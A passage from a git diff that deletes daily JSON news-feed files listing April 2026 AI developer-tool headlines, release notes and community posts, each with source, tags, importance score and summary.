Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀\n\nBut, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? I'd love to be ", - "category": "creative_tools" - }, - { - "title": "NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever", - "url": "https://x.com/JoseCSancho/status/2048587841882439784", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-27T15:59:13.833Z", - "summary": "Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today.", - "category": "ai_tools" - }, - { - "title": "NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap", - "url": "https://x.com/AIKumarvels/status/2048294442063970777", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-27T15:59:13.833Z", - "summary": "Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute.", - "category": "ai_tools" - }, - { - "title": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 fig…", - "url": "https://x.com/News_pulse360/status/2048733780744278450", - "source": "X / @news_pulse360", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-27T11:59:31.000Z", - "summary": "OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do", - "category": "ai_tools" - }, - { - "title": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…", - "url": "https://x.com/AlternativeTo/status/2048666474181808532", - "source": "X / @alternativeto", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-27T07:32:04.000Z", - "summary": "OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ …", - "category": "ai_tools" - }, - { - "title": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…", - "url": "https://x.com/witcheer/status/2048665173326532861", - "source": "X / @witcheer", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-27T07:26:54.000Z", - "summary": "two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. V4-Pro at $1.74/$3.48,", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-28.json b/data/news-feed-2026-04-28.json deleted file mode 100644 index bb29a10..0000000 --- a/data/news-feed-2026-04-28.json +++ /dev/null @@ -1,269 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.618Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-28", - "article_count": 15, - "archived_story_count": 683, - "articles": [ - { - "title": "Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors", - "url": "https://x.com/NousResearch/status/2047518675163636112", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "developer_tool", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T04:29:26.993Z", - "summary": "Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. The release is the largest update to the framework to date.", - "category": "ai_tools" - }, - { - "title": "Qwen Code sdk-typescript-v0.1.7 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "github_release", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "github_release", - "developer_tool", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-28T06:16:45.000Z", - "summary": "## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.15.3\n\nSource: latest stable CLI from npm\n\n---\n\n## Bundled CLI Version\n\nThis SDK release bundles CLI version: 0.13.1\n\nSource: latest stable CLI from npm\n\n---\n\n> Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation).\r\n\r\n## What's Changed\r\n* chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632\r\n* chore(release): sdk-typescript v0.1.4 by @qwen-c", - "category": "ai_tools" - }, - { - "title": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…", - "url": "https://x.com/CrowdStrike/status/2049179351837512138", - "source": "X / @crowdstrike", - "tags": [ - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "tool_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T17:30:04.000Z", - "summary": "Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. Track administrative changes, tool", - "category": "ai_tools" - }, - { - "title": "Gemini Launches Agentic Trading on a Regulated US Exchange", - "url": "https://x.com/xHub_AI/status/2049131460460745232", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.508Z", - "summary": "Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world.", - "category": "ai_tools" - }, - { - "title": "NVIDIA Ships One Model That Replaces Vision Speech and Text Chain", - "url": "https://x.com/benitoz/status/2049168050495053924", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.508Z", - "summary": "Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights.", - "category": "ai_tools" - }, - { - "title": "Warp Terminal Goes Open Source", - "url": "https://x.com/zeddotdev/status/2049167033275728343", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.507Z", - "summary": "Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure.", - "category": "ai_tools" - }, - { - "title": "NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", - "url": "https://x.com/ainews_24_7/status/2049178579510956193", - "source": "X / @ainews_24_7", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T17:26:59.000Z", - "summary": "NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI", - "category": "ai_tools" - }, - { - "title": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", - "url": "https://x.com/earlyn_ai/status/2049176023724359681", - "source": "X / @earlyn_ai", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-28T17:16:50.000Z", - "summary": "NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.", - "category": "ai_tools" - }, - { - "title": "shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", - "url": "https://x.com/DevLsx/status/2049019913465979131", - "source": "X / @devlsx", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-04-28T06:56:30.000Z", - "summary": "shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.", - "category": "ai_tools" - }, - { - "title": "I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code", - "url": "https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-04-28T11:06:30.000Z", - "summary": "I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos.\n\nSo I built ginnie-agents and ran my own team on it for months. Open-sourcing it now.\n\nWhat it is: a framework for a team of autonomous AI agents in your Slack workspace. Each agent has:\n\n\\- Its own Slack identity, app, avatar, channel\n\n\\- Persistent thre", - "category": "ai_tools" - }, - { - "title": "Qwen Code v0.15.4 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.78, - "date": "2026-04-28T13:22:30.000Z", - "summary": "## What's Changed\n* feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643\n* fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609\n* fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640\n* fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q", - "category": "ai_tools" - }, - { - "title": "Open source package with 1 million monthly downloads stole user credentials", - "url": "https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/", - "source": "Ars Technica AI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.74, - "date": "2026-04-28T06:01:02.337Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Your Claude Code project dashboard is now on the Mac App Store", - "url": "https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-04-28T21:56:14.000Z", - "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. \n\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\n\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo. \n \nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server ex", - "category": "ai_tools" - }, - { - "title": "ComfyUI Raises $30M at $500M Valuation", - "url": "https://x.com/robertnishihara/status/2047772168147374085", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-28T17:27:14.508Z", - "summary": "Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities.", - "category": "ai_tools" - }, - { - "title": "Scoble on One AI Doing Everything: The Everything App Is Coming", - "url": "https://x.com/Scobleizer/status/2048690528653660399", - "source": "Aligned News (Scoble)", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 1, - "date": "2026-04-28T17:27:13.257Z", - "summary": "Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. The vision is more radical than most industry commentary about AI integration.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-29.json b/data/news-feed-2026-04-29.json deleted file mode 100644 index 55e369f..0000000 --- a/data/news-feed-2026-04-29.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.824Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-29", - "article_count": 15, - "archived_story_count": 700, - "articles": [ - { - "title": "Vercel CLI @vercel/python-workers@0.0.19 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-04-29T20:39:18.000Z", - "summary": "### Patch Changes\n\n- b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends.\n- fddd88c: [vercel-workers] payload type validation\n- fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior.\n", - "category": "ai_tools" - }, - { - "title": "Converting Claude Code into the most intelligent Deep Research Agent", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-29T19:47:38.000Z", - "summary": "Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there.\n\nHyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro.\n\nIt uses a 16-step pipeline that creates a searchable, persistent knowled", - "category": "ai_tools" - }, - { - "title": "Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw", - "url": "https://x.com/Maginative/status/2049200033665569020", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-04-29T14:44:20.783Z", - "summary": "Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session.", - "category": "ai_tools" - }, - { - "title": "AAIF Announces AGNTCon and MCPCon EU and NA for 2026", - "url": "https://x.com/AgenticAIFdn/status/2039696612633571565", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "product_launch" - ], - "matching_tags": [ - "mcp", - "product_launch" - ], - "importance": 1, - "date": "2026-04-29T14:41:24.682Z", - "summary": "The Agentic AI Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders.", - "category": "ai_tools" - }, - { - "title": "Poolside AI Just Released Its First Public Models: Open Source and API", - "url": "https://x.com/marah_i_abdin/status/2049161468017287490", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-04-29T01:48:00.432Z", - "summary": "Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model.", - "category": "ai_tools" - }, - { - "title": "Qwen Code v0.15.5 released", - "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5", - "source": "GitHub Releases · Qwen Code", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-04-29T09:54:18.000Z", - "summary": "## What's Changed\n* mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279\n* fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667\n* feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687\n* feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577\n* feat(cli): wire backgrou", - "category": "ai_tools" - }, - { - "title": "The final nail in the coffin for entry level creative freelancers just dropped", - "url": "https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 0.94, - "date": "2026-04-29T09:55:19.000Z", - "summary": "Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type \"create a low poly beach scene with palm trees and sunset lighting\" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron\n\nThis is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects", - "category": "ai_tools" - }, - { - "title": "Launched My First App Using Claude", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-04-29T16:07:47.000Z", - "summary": "Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude.\n\nIt’s a vehicle management app. Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API).\n\nIt’s all front end, and everything is stored locally on the users device. The API calls do require a da", - "category": "ai_tools" - }, - { - "title": "Claude Design is amazing but I keep hitting rate limits. Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 0.78, - "date": "2026-04-29T15:15:33.000Z", - "summary": "Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations.\n\nFound an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit.\n\n\n\nWanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e", - "category": "ai_tools" - }, - { - "title": "Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling", - "url": "https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-29T18:23:09.000Z", - "summary": "So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all.\n\n**What Claude did autonomously:**\n\n* Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm)\n* Mapped every port and ", - "category": "ai_tools" - }, - { - "title": "Pattern I'm using to keep Claude Code productive on overnight unattended runs", - "url": "https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-04-29T06:51:16.000Z", - "summary": "Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code.\n\nBuilt a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v", - "category": "ai_tools" - }, - { - "title": "Your Claude Code project dashboard is now on the Mac App Store", - "url": "https://reddit.com/r/ClaudeAI/comments/1symv0c/your_claude_code_project_dashboard_is_now_on_the/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 0.7, - "date": "2026-04-29T03:13:42.000Z", - "summary": "Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free.\n\nApp Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691)\n\nQuick recap if you missed the original. \nStorybloq is a project tracker that lives in `.story/` inside your repo.\n\nTickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server expose it to ", - "category": "ai_tools" - }, - { - "title": "LosslessCut v3.68.0 released", - "url": "https://github.com/mifi/lossless-cut/releases/tag/v3.68.0", - "source": "GitHub Releases · LosslessCut", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.7, - "date": "2026-01-29T16:54:17.000Z", - "summary": "⚠️ **Warning:** The keyboard handling has changed as of v3.67.0 and later. If you after upgrading to this version ever revert to a version prior to v3.67.0, you **will lose your keyboard bindings**. Also there's an issue with migrating certain shortcuts with some keyboard layouts to the new version. See [TLDR here.](https://github.com/mifi/lossless-cut/issues/2671#issuecomment-3727638311)\r\n\r\nNote: there's a bug with the [app size of this version being larger](https://github.com/mifi/lossless-cut", - "category": "ai_tools" - }, - { - "title": "I built a Kanban board for Claude Code so I can run agent sessions straight from cards", - "url": "https://reddit.com/r/ClaudeAI/comments/1sye8bs/i_built_a_kanban_board_for_claude_code_so_i_can/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool" - ], - "importance": 0.54, - "date": "2026-04-28T21:04:05.000Z", - "summary": "I've been running 4-5 Claude Code sessions in parallel and kept losing track - which terminal had the auth work, which one was the bug fix, what's actually done.\n\nSo I added a Kanban board to **Vibeyard** (an open-source IDE I'm building for Claude Code). \n\nEach card is a task. Click run → it spins up a Claude session scoped to that task. When Claude finishes, the card moves itself to Done.\n\nIt turned Claude from \"a terminal I talk to\" into ", - "category": "ai_tools" - }, - { - "title": "Are we underweighting execution benchmarks when we talk about open-source frontier models?", - "url": "https://reddit.com/r/StableDiffusion/comments/1szb07b/are_we_underweighting_execution_benchmarks_when/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-29T20:41:38.000Z", - "summary": "A lot of open-source model discussion still centers on broad IQ-style evals or raw one-turn quality. What feels underdiscussed to me is whether execution-heavy evaluation is becoming its own frontier.\n\n\n\nLing-2.6-1T being open-sourced on Hugging Face today is one reason I’m thinking about this. Its stated profile is unusually explicit: precise instruct execution, strong results on execution-heavy / agentic tasks, low token overhead, and long-context task handling.\n\n\n\nIf more frontier open models", - "category": "creative_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-04-30.json b/data/news-feed-2026-04-30.json deleted file mode 100644 index b7d0e4d..0000000 --- a/data/news-feed-2026-04-30.json +++ /dev/null @@ -1,255 +0,0 @@ -{ - "generated": "2026-06-05T00:44:36.990Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-04-30", - "article_count": 15, - "archived_story_count": 692, - "articles": [ - { - "title": "[Open Source] We built a local code search MCP for Claude Code that uses ~98% fewer tokens than grep+read", - "url": "https://reddit.com/r/ClaudeAI/comments/1szvo7t/open_source_we_built_a_local_code_search_mcp_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-04-30T13:11:07.000Z", - "summary": "Working on large codebases with Claude Code, we kept running into the same issue: when Claude looks for relevant code, it falls back to grep, reading full files, or launching multiple subagents. This burns through tokens, and often misses the relevant code. There are some existing solutions (that we also benchmarked against), but they all had issues (too slow, needs API keys, quality not good enough, etc).\n\nWe built [Semble](https://github.com/MinishLab/semble) to fix this. It's a local MCP serv", - "category": "ai_tools" - }, - { - "title": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", - "url": "https://x.com/AI_BioPhD/status/2049769860897321027", - "source": "X / @ai_biophd", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-04-30T08:36:32.000Z", - "summary": "The \"Big Tech Steamroller\" is coming for your AI agent. Before you write another line of code, ask yourself: \"Can a trillion-dollar company do this with a single API update?\" If the answer is yes, pivot now.", - "category": "ai_tools" - }, - { - "title": "Cursor SDK — The Democratization of Agent Development", - "url": "https://x.com/Marktechpost/status/2049711306643759265", - "source": "Aligned News (Scoble)", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-30T05:23:49.823Z", - "summary": "Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment.", - "category": "ai_tools" - }, - { - "title": "Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", - "url": "https://x.com/Codex_Changelog/status/2049905403262079480", - "source": "X / @codex_changelog", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.97, - "date": "2026-04-30T17:35:08.000Z", - "summary": "Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", - "category": "ai_tools" - }, - { - "title": "Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell", - "url": "https://pu.dev/", - "source": "Hacker News", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 0.88, - "date": "2026-04-30T20:55:12.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.8600000000000001, - "date": "2026-04-30T15:59:02.000Z", - "summary": "Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it.\n\nLightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). About 47K lines of Go, 114 MCP too", - "category": "ai_tools" - }, - { - "title": "pnpm v11.0.3 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.3", - "source": "GitHub Releases · pnpm", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-30T21:17:05.000Z", - "summary": "## Patch Changes\r\n\r\n* Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412).\r\n* Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na", - "category": "ai_tools" - }, - { - "title": "Vercel CLI @vercel/python-workers@0.0.20 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.76, - "date": "2026-04-30T03:51:45.000Z", - "summary": "### Patch Changes\n\n- 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers\n", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.40.1 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - 